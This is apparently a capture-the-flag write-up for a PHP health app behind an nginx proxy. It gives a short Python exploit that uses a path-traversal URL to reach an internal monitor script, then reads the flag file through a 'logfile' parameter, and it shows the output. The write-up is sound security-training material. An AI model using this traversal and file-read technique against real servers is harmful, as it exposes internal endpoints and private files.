Diefunction
Search…
Config

Project

Structure

config
├── health-app/
│ ├── external/
│ └── index.php
│ ├── flag/
│ └── flag.txt
│ ├── internal/
│ ├── index.php
│ └── monitor.php
│ └── Dockerfile
└── nginx-proxy/
├── Dockerfile
└── nginx.conf

Solution

Install pip
sudo apt install python3-pip
Install requests
python3 -m pip install requests
Exploit
from requests import post
host = '127.0.0.1'
port = '8001'
payload = {
'logfile': '/flag/flag.txt'
}
flag = post(f'http://{host}:{port}/health../internal/monitor.php', data = payload).text
print(flag)
Run the script
python3 exploit.py
Output
TCC{n91NX_rpR0xY_M15C0nF19Ur4t10n}<br>
Last modified 7mo ago
Copy link